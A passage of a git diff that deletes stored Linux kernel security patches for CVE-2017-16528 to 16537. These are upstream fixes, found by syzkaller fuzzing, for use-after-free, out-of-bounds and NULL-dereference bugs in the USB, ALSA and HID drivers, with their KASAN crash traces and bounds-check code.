- snd_usb_create_quirk+0x92/0x100 sound/usb/quirks.c:560
- usb_audio_probe+0x1040/0x2c10 sound/usb/card.c:618
- ....
-
- Freed by task 1484:
- save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
- save_stack+0x43/0xd0 mm/kasan/kasan.c:447
- set_track mm/kasan/kasan.c:459
- kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:524
- slab_free_hook mm/slub.c:1390
- slab_free_freelist_hook mm/slub.c:1412
- slab_free mm/slub.c:2988
- kfree+0xf6/0x2f0 mm/slub.c:3919
- snd_usb_mixer_free+0x11a/0x160 sound/usb/mixer.c:2244
- snd_usb_mixer_dev_free+0x36/0x50 sound/usb/mixer.c:2250
- __snd_device_free+0x1ff/0x380 sound/core/device.c:91
- snd_device_free_all+0x8f/0xe0 sound/core/device.c:244
- snd_card_do_free sound/core/init.c:461
- release_card_device+0x47/0x170 sound/core/init.c:181
- device_release+0x13f/0x210 drivers/base/core.c:814
- ....
-
-Actually such a URB is killed properly at disconnection when the
-device gets probed successfully, and what we need is to apply it for
-the error-path, too.
-
-In this patch, we apply snd_usb_mixer_disconnect() at releasing.
-Also introduce a new flag, disconnected, to struct usb_mixer_interface
-for not performing the disconnection procedure twice.
-
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/usb/mixer.c | 12 ++++++++++--
- sound/usb/mixer.h | 2 ++
- 2 files changed, 12 insertions(+), 2 deletions(-)
-
-diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c
-index 9732edf77f860..91bc8f18791e4 100644
----- a/sound/usb/mixer.c
-+++ b/sound/usb/mixer.c
-@@ -2234,6 +2234,9 @@ static int parse_audio_unit(struct mixer_build *state, int unitid)
-
- static void snd_usb_mixer_free(struct usb_mixer_interface *mixer)
- {
-+ /* kill pending URBs */
-+ snd_usb_mixer_disconnect(mixer);
-+
- kfree(mixer->id_elems);
- if (mixer->urb) {
- kfree(mixer->urb->transfer_buffer);
-@@ -2584,8 +2587,13 @@ int snd_usb_create_mixer(struct snd_usb_audio *chip, int ctrlif,
-
- void snd_usb_mixer_disconnect(struct usb_mixer_interface *mixer)
- {
-- usb_kill_urb(mixer->urb);
-- usb_kill_urb(mixer->rc_urb);
-+ if (mixer->disconnected)
-+ return;
-+ if (mixer->urb)
-+ usb_kill_urb(mixer->urb);
-+ if (mixer->rc_urb)
-+ usb_kill_urb(mixer->rc_urb);
-+ mixer->disconnected = true;
- }
-
- #ifdef CONFIG_PM
-diff --git a/sound/usb/mixer.h b/sound/usb/mixer.h
-index 2b4b067646ab0..545d99b09706b 100644
----- a/sound/usb/mixer.h
-+++ b/sound/usb/mixer.h
-@@ -22,6 +22,8 @@ struct usb_mixer_interface {
- struct urb *rc_urb;
- struct usb_ctrlrequest *rc_setup_packet;
- u8 rc_buffer[6];
-+
-+ bool disconnected;
- };
-
- #define MAX_CHANNELS 16 /* max logical channels */
diff --git a/Patches/Linux_CVEs/CVE-2017-16528/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16528/^4.13/0001.patch
deleted file mode 100644
index b4e444be..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16528/^4.13/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From fc27fe7e8deef2f37cba3f2be2d52b6ca5eb9d57 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Tue, 12 Sep 2017 12:41:20 +0200
-Subject: [PATCH] ALSA: seq: Cancel pending autoload work at unbinding device
-
-ALSA sequencer core has a mechanism to load the enumerated devices
-automatically, and it's performed in an off-load work. This seems
-causing some race when a sequencer is removed while the pending
-autoload work is running. As syzkaller spotted, it may lead to some
-use-after-free:
- BUG: KASAN: use-after-free in snd_rawmidi_dev_seq_free+0x69/0x70
- sound/core/rawmidi.c:1617
- Write of size 8 at addr ffff88006c611d90 by task kworker/2:1/567
-
- CPU: 2 PID: 567 Comm: kworker/2:1 Not tainted 4.13.0+ #29
- Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- Workqueue: events autoload_drivers
- Call Trace:
- __dump_stack lib/dump_stack.c:16 [inline]
- dump_stack+0x192/0x22c lib/dump_stack.c:52
- print_address_description+0x78/0x280 mm/kasan/report.c:252
- kasan_report_error mm/kasan/report.c:351 [inline]
- kasan_report+0x230/0x340 mm/kasan/report.c:409
- __asan_report_store8_noabort+0x1c/0x20 mm/kasan/report.c:435
- snd_rawmidi_dev_seq_free+0x69/0x70 sound/core/rawmidi.c:1617
- snd_seq_dev_release+0x4f/0x70 sound/core/seq_device.c:192
- device_release+0x13f/0x210 drivers/base/core.c:814
- kobject_cleanup lib/kobject.c:648 [inline]
- kobject_release lib/kobject.c:677 [inline]
- kref_put include/linux/kref.h:70 [inline]
- kobject_put+0x145/0x240 lib/kobject.c:694
- put_device+0x25/0x30 drivers/base/core.c:1799
- klist_devices_put+0x36/0x40 drivers/base/bus.c:827
- klist_next+0x264/0x4a0 lib/klist.c:403
- next_device drivers/base/bus.c:270 [inline]
- bus_for_each_dev+0x17e/0x210 drivers/base/bus.c:312
- autoload_drivers+0x3b/0x50 sound/core/seq_device.c:117
- process_one_work+0x9fb/0x1570 kernel/workqueue.c:2097
- worker_thread+0x1e4/0x1350 kernel/workqueue.c:2231
- kthread+0x324/0x3f0 kernel/kthread.c:231
- ret_from_fork+0x25/0x30 arch/x86/entry/entry_64.S:425
-
-The fix is simply to assure canceling the autoload work at removing
-the device.
-
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/core/seq_device.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/sound/core/seq_device.c b/sound/core/seq_device.c
-index c4acf17e9f5e5..e40a2cba5002a 100644
----- a/sound/core/seq_device.c
-+++ b/sound/core/seq_device.c
-@@ -148,8 +148,10 @@ void snd_seq_device_load_drivers(void)
- flush_work(&autoload_work);
- }
- EXPORT_SYMBOL(snd_seq_device_load_drivers);
-+#define cancel_autoload_drivers() cancel_work_sync(&autoload_work)
- #else
- #define queue_autoload_drivers() /* NOP */
-+#define cancel_autoload_drivers() /* NOP */
- #endif
-
- /*
-@@ -159,6 +161,7 @@ static int snd_seq_device_dev_free(struct snd_device *device)
- {
- struct snd_seq_device *dev = device->device_data;
-
-+ cancel_autoload_drivers();
- put_device(&dev->dev);
- return 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-16529/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16529/^4.13/0001.patch
deleted file mode 100644
index 3f690299..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16529/^4.13/0001.patch
+++ /dev/null
@@ -1,115 +0,0 @@
-From bfc81a8bc18e3c4ba0cbaa7666ff76be2f998991 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai
-Date: Fri, 22 Sep 2017 16:18:53 +0200
-Subject: [PATCH] ALSA: usb-audio: Check out-of-bounds access by corrupted
- buffer descriptor
-
-When a USB-audio device receives a maliciously adjusted or corrupted
-buffer descriptor, the USB-audio driver may access an out-of-bounce
-value at its parser. This was detected by syzkaller, something like:
-
- BUG: KASAN: slab-out-of-bounds in usb_audio_probe+0x27b2/0x2ab0
- Read of size 1 at addr ffff88006b83a9e8 by task kworker/0:1/24
- CPU: 0 PID: 24 Comm: kworker/0:1 Not tainted 4.14.0-rc1-42251-gebb2c2437d80 #224
- Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- Workqueue: usb_hub_wq hub_event
- Call Trace:
- __dump_stack lib/dump_stack.c:16
- dump_stack+0x292/0x395 lib/dump_stack.c:52
- print_address_description+0x78/0x280 mm/kasan/report.c:252
- kasan_report_error mm/kasan/report.c:351
- kasan_report+0x22f/0x340 mm/kasan/report.c:409
- __asan_report_load1_noabort+0x19/0x20 mm/kasan/report.c:427
- snd_usb_create_streams sound/usb/card.c:248
- usb_audio_probe+0x27b2/0x2ab0 sound/usb/card.c:605
- usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361
- really_probe drivers/base/dd.c:413
- driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
- __device_attach_driver+0x230/0x290 drivers/base/dd.c:653
- bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
- __device_attach+0x26e/0x3d0 drivers/base/dd.c:710
- device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
- bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
- device_add+0xd0b/0x1660 drivers/base/core.c:1835
- usb_set_configuration+0x104e/0x1870 drivers/usb/core/message.c:1932
- generic_probe+0x73/0xe0 drivers/usb/core/generic.c:174
- usb_probe_device+0xaf/0xe0 drivers/usb/core/driver.c:266
- really_probe drivers/base/dd.c:413
- driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
- __device_attach_driver+0x230/0x290 drivers/base/dd.c:653
- bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
- __device_attach+0x26e/0x3d0 drivers/base/dd.c:710
- device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
- bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
- device_add+0xd0b/0x1660 drivers/base/core.c:1835
- usb_new_device+0x7b8/0x1020 drivers/usb/core/hub.c:2457
- hub_port_connect drivers/usb/core/hub.c:4903
- hub_port_connect_change drivers/usb/core/hub.c:5009
- port_event drivers/usb/core/hub.c:5115
- hub_event+0x194d/0x3740 drivers/usb/core/hub.c:5195
- process_one_work+0xc7f/0x1db0 kernel/workqueue.c:2119
- worker_thread+0x221/0x1850 kernel/workqueue.c:2253
- kthread+0x3a1/0x470 kernel/kthread.c:231
- ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431
-
-This patch adds the checks of out-of-bounce accesses at appropriate
-places and bails out when it goes out of the given buffer.
-
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/usb/card.c | 20 ++++++++++++++++++++
- 1 file changed, 20 insertions(+)
-
-diff --git a/sound/usb/card.c b/sound/usb/card.c
-index 3dc36d9135502..23d1d23aefec3 100644
----- a/sound/usb/card.c
-+++ b/sound/usb/card.c
-@@ -221,6 +221,7 @@ static int snd_usb_create_streams(struct snd_usb_audio *chip, int ctrlif)
- struct usb_interface_descriptor *altsd;
- void *control_header;
- int i, protocol;
-+ int rest_bytes;
-
- /* find audiocontrol interface */
- host_iface = &usb_ifnum_to_if(dev, ctrlif)->altsetting[0];
-@@ -235,6 +236,15 @@ static int snd_usb_create_streams(struct snd_usb_audio *chip, int ctrlif)
- return -EINVAL;
- }
-
-+ rest_bytes = (void *)(host_iface->extra + host_iface->extralen) -
-+ control_header;
-+
-+ /* just to be sure -- this shouldn't hit at all */
-+ if (rest_bytes <= 0) {
-+ dev_err(&dev->dev, "invalid control header\n");
-+ return -EINVAL;
-+ }
-+
- switch (protocol) {
- default:
- dev_warn(&dev->dev,
-@@ -245,11 +255,21 @@ static int snd_usb_create_streams(struct snd_usb_audio *chip, int ctrlif)
- case UAC_VERSION_1: {
- struct uac1_ac_header_descriptor *h1 = control_header;
-
-+ if (rest_bytes < sizeof(*h1)) {
-+ dev_err(&dev->dev, "too short v1 buffer descriptor\n");
-+ return -EINVAL;
-+ }
-+
- if (!h1->bInCollection) {
- dev_info(&dev->dev, "skipping empty audio interface (v1)\n");
- return -EINVAL;
- }
-
-+ if (rest_bytes < h1->bLength) {
-+ dev_err(&dev->dev, "invalid buffer length (v1)\n");
-+ return -EINVAL;
-+ }
-+
- if (h1->bLength < sizeof(*h1) + h1->bInCollection) {
- dev_err(&dev->dev, "invalid UAC_HEADER (v1)\n");
- return -EINVAL;
diff --git a/Patches/Linux_CVEs/CVE-2017-16530/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16530/^4.13/0001.patch
deleted file mode 100644
index fb683e22..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16530/^4.13/0001.patch
+++ /dev/null
@@ -1,102 +0,0 @@
-From 786de92b3cb26012d3d0f00ee37adf14527f35c4 Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Fri, 22 Sep 2017 11:56:49 -0400
-Subject: [PATCH] USB: uas: fix bug in handling of alternate settings
-
-The uas driver has a subtle bug in the way it handles alternate
-settings. The uas_find_uas_alt_setting() routine returns an
-altsetting value (the bAlternateSetting number in the descriptor), but
-uas_use_uas_driver() then treats that value as an index to the
-intf->altsetting array, which it isn't.
-
-Normally this doesn't cause any problems because the various
-alternate settings have bAlternateSetting values 0, 1, 2, ..., so the
-value is equal to the index in the array. But this is not guaranteed,
-and Andrey Konovalov used the syzkaller fuzzer with KASAN to get a
-slab-out-of-bounds error by violating this assumption.
-
-This patch fixes the bug by making uas_find_uas_alt_setting() return a
-pointer to the altsetting entry rather than either the value or the
-index. Pointers are less subject to misinterpretation.
-
-Signed-off-by: Alan Stern
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-CC: Oliver Neukum
-CC:
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/storage/uas-detect.h | 15 ++++++++-------
- drivers/usb/storage/uas.c | 10 +++++-----
- 2 files changed, 13 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/usb/storage/uas-detect.h b/drivers/usb/storage/uas-detect.h
-index f58caa9e6a27e..a155cd02bce24 100644
----- a/drivers/usb/storage/uas-detect.h
-+++ b/drivers/usb/storage/uas-detect.h
-@@ -9,7 +9,8 @@ static int uas_is_interface(struct usb_host_interface *intf)
- intf->desc.bInterfaceProtocol == USB_PR_UAS);
- }
-
--static int uas_find_uas_alt_setting(struct usb_interface *intf)
-+static struct usb_host_interface *uas_find_uas_alt_setting(
-+ struct usb_interface *intf)
- {
- int i;
-
-@@ -17,10 +18,10 @@ static int uas_find_uas_alt_setting(struct usb_interface *intf)
- struct usb_host_interface *alt = &intf->altsetting[i];
-
- if (uas_is_interface(alt))
-- return alt->desc.bAlternateSetting;
-+ return alt;
- }
-
-- return -ENODEV;
-+ return NULL;
- }
-
- static int uas_find_endpoints(struct usb_host_interface *alt,
-@@ -58,14 +59,14 @@ static int uas_use_uas_driver(struct usb_interface *intf,
- struct usb_device *udev = interface_to_usbdev(intf);
- struct usb_hcd *hcd = bus_to_hcd(udev->bus);
- unsigned long flags = id->driver_info;
-- int r, alt;
--
-+ struct usb_host_interface *alt;
-+ int r;
-
- alt = uas_find_uas_alt_setting(intf);
-- if (alt < 0)
-+ if (!alt)
- return 0;
-
-- r = uas_find_endpoints(&intf->altsetting[alt], eps);
-+ r = uas_find_endpoints(alt, eps);
- if (r < 0)
- return 0;
-
-diff --git a/drivers/usb/storage/uas.c b/drivers/usb/storage/uas.c
-index cfb1e3bbd4347..63cf981ed81cf 100644
----- a/drivers/usb/storage/uas.c
-+++ b/drivers/usb/storage/uas.c
-@@ -873,14 +873,14 @@ MODULE_DEVICE_TABLE(usb, uas_usb_ids);
- static int uas_switch_interface(struct usb_device *udev,
- struct usb_interface *intf)
- {
-- int alt;
-+ struct usb_host_interface *alt;
-
- alt = uas_find_uas_alt_setting(intf);
-- if (alt < 0)
-- return alt;
-+ if (!alt)
-+ return -ENODEV;
-
-- return usb_set_interface(udev,
-- intf->altsetting[0].desc.bInterfaceNumber, alt);
-+ return usb_set_interface(udev, alt->desc.bInterfaceNumber,
-+ alt->desc.bAlternateSetting);
- }
-
- static int uas_configure_endpoints(struct uas_dev_info *devinfo)
diff --git a/Patches/Linux_CVEs/CVE-2017-16531/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16531/^4.13/0001.patch
deleted file mode 100644
index 8f6fc288..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16531/^4.13/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From bd7a3fe770ebd8391d1c7d072ff88e9e76d063eb Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman
-Date: Tue, 19 Sep 2017 15:07:17 +0200
-Subject: [PATCH] USB: fix out-of-bounds in usb_set_configuration
-
-Andrey Konovalov reported a possible out-of-bounds problem for a USB interface
-association descriptor. He writes:
- It seems there's no proper size check of a USB_DT_INTERFACE_ASSOCIATION
- descriptor. It's only checked that the size is >= 2 in
- usb_parse_configuration(), so find_iad() might do out-of-bounds access
- to intf_assoc->bInterfaceCount.
-
-And he's right, we don't check for crazy descriptors of this type very well, so
-resolve this problem. Yet another issue found by syzkaller...
-
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Cc: stable
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/core/config.c | 14 +++++++++++---
- include/uapi/linux/usb/ch9.h | 1 +
- 2 files changed, 12 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
-index 854c8d66cfbef..68b54bd88d1eb 100644
----- a/drivers/usb/core/config.c
-+++ b/drivers/usb/core/config.c
-@@ -643,15 +643,23 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
-
- } else if (header->bDescriptorType ==
- USB_DT_INTERFACE_ASSOCIATION) {
-+ struct usb_interface_assoc_descriptor *d;
-+
-+ d = (struct usb_interface_assoc_descriptor *)header;
-+ if (d->bLength < USB_DT_INTERFACE_ASSOCIATION_SIZE) {
-+ dev_warn(ddev,
-+ "config %d has an invalid interface association descriptor of length %d, skipping\n",
-+ cfgno, d->bLength);
-+ continue;
-+ }
-+
- if (iad_num == USB_MAXIADS) {
- dev_warn(ddev, "found more Interface "
- "Association Descriptors "
- "than allocated for in "
- "configuration %d\n", cfgno);
- } else {
-- config->intf_assoc[iad_num] =
-- (struct usb_interface_assoc_descriptor
-- *)header;
-+ config->intf_assoc[iad_num] = d;
- iad_num++;
- }
-
-diff --git a/include/uapi/linux/usb/ch9.h b/include/uapi/linux/usb/ch9.h
-index ce1169af39d72..2a5d63040a0b0 100644
----- a/include/uapi/linux/usb/ch9.h
-+++ b/include/uapi/linux/usb/ch9.h
-@@ -780,6 +780,7 @@ struct usb_interface_assoc_descriptor {
- __u8 iFunction;
- } __attribute__ ((packed));
-
-+#define USB_DT_INTERFACE_ASSOCIATION_SIZE 8
-
- /*-------------------------------------------------------------------------*/
-
diff --git a/Patches/Linux_CVEs/CVE-2017-16532/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16532/^4.13/0001.patch
deleted file mode 100644
index f7439659..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16532/^4.13/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 7c80f9e4a588f1925b07134bb2e3689335f6c6d8 Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Fri, 29 Sep 2017 10:54:24 -0400
-Subject: [PATCH] usb: usbtest: fix NULL pointer dereference
-
-If the usbtest driver encounters a device with an IN bulk endpoint but
-no OUT bulk endpoint, it will try to dereference a NULL pointer
-(out->desc.bEndpointAddress). The problem can be solved by adding a
-missing test.
-
-Signed-off-by: Alan Stern
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Signed-off-by: Felipe Balbi
----
- drivers/usb/misc/usbtest.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/misc/usbtest.c b/drivers/usb/misc/usbtest.c
-index 113e38bfe0ef9..b3fc602b2e247 100644
----- a/drivers/usb/misc/usbtest.c
-+++ b/drivers/usb/misc/usbtest.c
-@@ -202,12 +202,13 @@ get_endpoints(struct usbtest_dev *dev, struct usb_interface *intf)
- return tmp;
- }
-
-- if (in) {
-+ if (in)
- dev->in_pipe = usb_rcvbulkpipe(udev,
- in->desc.bEndpointAddress & USB_ENDPOINT_NUMBER_MASK);
-+ if (out)
- dev->out_pipe = usb_sndbulkpipe(udev,
- out->desc.bEndpointAddress & USB_ENDPOINT_NUMBER_MASK);
-- }
-+
- if (iso_in) {
- dev->iso_in = &iso_in->desc;
- dev->in_iso_pipe = usb_rcvisocpipe(udev,
diff --git a/Patches/Linux_CVEs/CVE-2017-16533/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16533/^4.13/0001.patch
deleted file mode 100644
index d44e3e43..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16533/^4.13/0001.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From f043bfc98c193c284e2cd768fefabe18ac2fed9b Mon Sep 17 00:00:00 2001
-From: Jaejoong Kim
-Date: Thu, 28 Sep 2017 19:16:30 +0900
-Subject: [PATCH] HID: usbhid: fix out-of-bounds bug
-
-The hid descriptor identifies the length and type of subordinate
-descriptors for a device. If the received hid descriptor is smaller than
-the size of the struct hid_descriptor, it is possible to cause
-out-of-bounds.
-
-In addition, if bNumDescriptors of the hid descriptor have an incorrect
-value, this can also cause out-of-bounds while approaching hdesc->desc[n].
-
-So check the size of hid descriptor and bNumDescriptors.
-
- BUG: KASAN: slab-out-of-bounds in usbhid_parse+0x9b1/0xa20
- Read of size 1 at addr ffff88006c5f8edf by task kworker/1:2/1261
-
- CPU: 1 PID: 1261 Comm: kworker/1:2 Not tainted
- 4.14.0-rc1-42251-gebb2c2437d80 #169
- Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- Workqueue: usb_hub_wq hub_event
- Call Trace:
- __dump_stack lib/dump_stack.c:16
- dump_stack+0x292/0x395 lib/dump_stack.c:52
- print_address_description+0x78/0x280 mm/kasan/report.c:252
- kasan_report_error mm/kasan/report.c:351
- kasan_report+0x22f/0x340 mm/kasan/report.c:409
- __asan_report_load1_noabort+0x19/0x20 mm/kasan/report.c:427
- usbhid_parse+0x9b1/0xa20 drivers/hid/usbhid/hid-core.c:1004
- hid_add_device+0x16b/0xb30 drivers/hid/hid-core.c:2944
- usbhid_probe+0xc28/0x1100 drivers/hid/usbhid/hid-core.c:1369
- usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361
- really_probe drivers/base/dd.c:413
- driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
- __device_attach_driver+0x230/0x290 drivers/base/dd.c:653
- bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
- __device_attach+0x26e/0x3d0 drivers/base/dd.c:710
- device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
- bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
- device_add+0xd0b/0x1660 drivers/base/core.c:1835
- usb_set_configuration+0x104e/0x1870 drivers/usb/core/message.c:1932
- generic_probe+0x73/0xe0 drivers/usb/core/generic.c:174
- usb_probe_device+0xaf/0xe0 drivers/usb/core/driver.c:266
- really_probe drivers/base/dd.c:413
- driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
- __device_attach_driver+0x230/0x290 drivers/base/dd.c:653
- bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
- __device_attach+0x26e/0x3d0 drivers/base/dd.c:710
- device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
- bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
- device_add+0xd0b/0x1660 drivers/base/core.c:1835
- usb_new_device+0x7b8/0x1020 drivers/usb/core/hub.c:2457
- hub_port_connect drivers/usb/core/hub.c:4903
- hub_port_connect_change drivers/usb/core/hub.c:5009
- port_event drivers/usb/core/hub.c:5115
- hub_event+0x194d/0x3740 drivers/usb/core/hub.c:5195
- process_one_work+0xc7f/0x1db0 kernel/workqueue.c:2119
- worker_thread+0x221/0x1850 kernel/workqueue.c:2253
- kthread+0x3a1/0x470 kernel/kthread.c:231
- ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431
-
-Cc: stable@vger.kernel.org
-Reported-by: Andrey Konovalov
-Signed-off-by: Jaejoong Kim
-Tested-by: Andrey Konovalov
-Acked-by: Alan Stern
-Signed-off-by: Jiri Kosina
----
- drivers/hid/usbhid/hid-core.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/hid/usbhid/hid-core.c b/drivers/hid/usbhid/hid-core.c
-index 089bad8a9a21d..045b5da9b9928 100644
----- a/drivers/hid/usbhid/hid-core.c
-+++ b/drivers/hid/usbhid/hid-core.c
-@@ -975,6 +975,8 @@ static int usbhid_parse(struct hid_device *hid)
- unsigned int rsize = 0;
- char *rdesc;
- int ret, n;
-+ int num_descriptors;
-+ size_t offset = offsetof(struct hid_descriptor, desc);
-
- quirks = usbhid_lookup_quirk(le16_to_cpu(dev->descriptor.idVendor),
- le16_to_cpu(dev->descriptor.idProduct));
-@@ -997,10 +999,18 @@ static int usbhid_parse(struct hid_device *hid)
- return -ENODEV;
- }
-
-+ if (hdesc->bLength < sizeof(struct hid_descriptor)) {
-+ dbg_hid("hid descriptor is too short\n");
-+ return -EINVAL;
-+ }
-+
- hid->version = le16_to_cpu(hdesc->bcdHID);
- hid->country = hdesc->bCountryCode;
-
-- for (n = 0; n < hdesc->bNumDescriptors; n++)
-+ num_descriptors = min_t(int, hdesc->bNumDescriptors,
-+ (hdesc->bLength - offset) / sizeof(struct hid_class_descriptor));
-+
-+ for (n = 0; n < num_descriptors; n++)
- if (hdesc->desc[n].bDescriptorType == HID_DT_REPORT)
- rsize = le16_to_cpu(hdesc->desc[n].wDescriptorLength);
-
diff --git a/Patches/Linux_CVEs/CVE-2017-16534/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16534/^4.13/0001.patch
deleted file mode 100644
index 6056f314..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16534/^4.13/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 2e1c42391ff2556387b3cb6308b24f6f65619feb Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman
-Date: Thu, 21 Sep 2017 16:58:48 +0200
-Subject: [PATCH] USB: core: harden cdc_parse_cdc_header
-
-Andrey Konovalov reported a possible out-of-bounds problem for the
-cdc_parse_cdc_header function. He writes:
- It looks like cdc_parse_cdc_header() doesn't validate buflen
- before accessing buffer[1], buffer[2] and so on. The only check
- present is while (buflen > 0).
-
-So fix this issue up by properly validating the buffer length matches
-what the descriptor says it is.
-
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Cc: stable
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/core/message.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/usb/core/message.c b/drivers/usb/core/message.c
-index 4c38ea41ae969..371a07d874a37 100644
----- a/drivers/usb/core/message.c
-+++ b/drivers/usb/core/message.c
-@@ -2069,6 +2069,10 @@ int cdc_parse_cdc_header(struct usb_cdc_parsed_header *hdr,
- elength = 1;
- goto next_desc;
- }
-+ if ((buflen < elength) || (elength < 3)) {
-+ dev_err(&intf->dev, "invalid descriptor buffer length\n");
-+ break;
-+ }
- if (buffer[1] != USB_DT_CS_INTERFACE) {
- dev_err(&intf->dev, "skipping garbage\n");
- goto next_desc;
diff --git a/Patches/Linux_CVEs/CVE-2017-16535/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16535/^4.13/0001.patch
deleted file mode 100644
index 310c58c9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16535/^4.13/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 1c0edc3633b56000e18d82fc241e3995ca18a69e Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Wed, 18 Oct 2017 12:49:38 -0400
-Subject: [PATCH] USB: core: fix out-of-bounds access bug in
- usb_get_bos_descriptor()
-
-Andrey used the syzkaller fuzzer to find an out-of-bounds memory
-access in usb_get_bos_descriptor(). The code wasn't checking that the
-next usb_dev_cap_header structure could fit into the remaining buffer
-space.
-
-This patch fixes the error and also reduces the bNumDeviceCaps field
-in the header to match the actual number of capabilities found, in
-cases where there are fewer than expected.
-
-Reported-by: Andrey Konovalov
-Signed-off-by: Alan Stern
-Tested-by: Andrey Konovalov
-CC:
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/usb/core/config.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
-index 68b54bd88d1eb..883549ee946cb 100644
----- a/drivers/usb/core/config.c
-+++ b/drivers/usb/core/config.c
-@@ -960,10 +960,12 @@ int usb_get_bos_descriptor(struct usb_device *dev)
- for (i = 0; i < num; i++) {
- buffer += length;
- cap = (struct usb_dev_cap_header *)buffer;
-- length = cap->bLength;
-
-- if (total_len < length)
-+ if (total_len < sizeof(*cap) || total_len < cap->bLength) {
-+ dev->bos->desc->bNumDeviceCaps = i;
- break;
-+ }
-+ length = cap->bLength;
- total_len -= length;
-
- if (cap->bDescriptorType != USB_DT_DEVICE_CAPABILITY) {
diff --git a/Patches/Linux_CVEs/CVE-2017-16537/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16537/^4.13/0001.patch
deleted file mode 100644
index c5eeb700..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16537/^4.13/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 58fd55e838276a0c13d1dc7c387f90f25063cbf3 Mon Sep 17 00:00:00 2001
-From: Arvind Yadav
-Date: Mon, 9 Oct 2017 20:14:48 +0200
-Subject: [PATCH] media: imon: Fix null-ptr-deref in imon_probe
-
-It seems that the return value of usb_ifnum_to_if() can be NULL and
-needs to be checked.
-
-Signed-off-by: Arvind Yadav
-Tested-by: Andrey Konovalov
-Signed-off-by: Sean Young
-Signed-off-by: Mauro Carvalho Chehab
----
- drivers/media/rc/imon.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/media/rc/imon.c b/drivers/media/rc/imon.c
